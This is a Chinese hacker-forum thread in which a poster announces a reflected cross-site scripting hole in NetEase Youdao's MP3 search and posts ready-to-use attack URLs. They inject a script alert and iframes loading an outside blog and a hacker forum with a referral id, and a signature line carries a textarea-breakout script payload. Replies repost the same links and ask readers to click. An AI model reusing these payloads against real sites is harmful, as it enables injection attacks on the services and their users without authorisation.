打印

[原创] 网易搜索!!! XSS跨的就是你!!!

网易搜索!!! XSS跨的就是你!!!

管理员XIAOYY发了X论坛的XSS,贴子人气,居然盖过了,我发的盛大XSS.5555555,终于天无绝人之路.历经1.5个小时.我发现了下面页面的问题.
双手奉上我的成果网易搜索XSS.希望大家能回个贴.谢谢,
XSS测试代码:
http://mp3.youdao.com/search?keyfrom=music.top&q=X&btnSearchTop=%E6%90%9C+%E7%B4%A2&t=ALL">%3Cscript%3Ealert('XSS')%3C/script%3E%20<"

请复制完再回车.

框架代码(大家帮忙点下):
http://mp3.youdao.com/search?keyfrom=music.top&q=X&btnSearchTop=%E6%90%9C+%E7%B4%A2&t=ALL"><iframe%20src=http://hh312623376.blog.163.com/%20width=900%20height=1200></iframe><"
美眉的BLOG
本帖最近评分记录
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

复制内容到剪贴板
代码:
http://mp3.youdao.com/search?keyfrom=music.top&q=X&btnSearchTop=%E6%90%9C+%E7%B4%A2&t=ALL"><iframe%20src=http://bbs.hackerxfiles.net/?fromuid=5348/%20width=900%20height=1200></iframe><"
http://mp3.youdao.com/search?key ... %E7%B4%A2&t=ALL">%3Cscript%3Ealert('XSS')%3C/script%3E%20<"

TOP

http://mp3.youdao.com/search?key ... %E7%B4%A2&t=ALL">%3Cscript%3Ealert('XSS')%3C/script%3E%20<"%20
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

Processed in 0.021660 second(s), 6 queries, Gzip enabled